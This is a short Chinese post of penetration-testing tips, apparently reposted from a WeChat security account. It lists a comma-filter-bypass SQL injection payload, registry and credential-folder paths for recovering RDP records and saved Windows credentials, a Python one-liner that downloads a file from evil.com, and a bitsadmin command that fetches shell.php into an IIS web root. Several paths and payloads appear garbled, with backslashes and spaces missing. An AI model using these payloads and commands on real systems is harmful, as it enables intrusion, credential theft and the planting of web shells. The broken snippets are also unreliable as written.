分享几个tips,不记得哪里找的了。
注入过滤逗号
127' UNION SELECT * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)#
注册表查看rdp记录
[HKEY_USERSS-1-5-21-1387774393-1596258019-1651181295-500SoftwareMicrosoftTerminal Server ClientDefault]
C:Documents and SettingsAdministratorAppDataLocalMicrosoftCredentials
只反弹个shell,传文件
curl ,ftp,wget,nc
python -c 'import urllib;urllib.urlretrieve("http://evil.com/evil.file","/path/to/save/evil.file")'
nc 'BASE64' | base64 -d > xxx
powershell读写文件
读文本文件:
$file = Get-Content "1.txt"
写文本文件:
Set-content "1.txt" "wocao"
读二进制文件:
[System.IO.File]::ReadAllBytes('1.exe')
写二进制文件:
[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)
下载文件
windows: bitsadmin /transfer n http://192.168.1.1/shell.php c:inetpubwwwrootshell.php
本文始发于微信公众号(关注安全技术):1233211234567
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论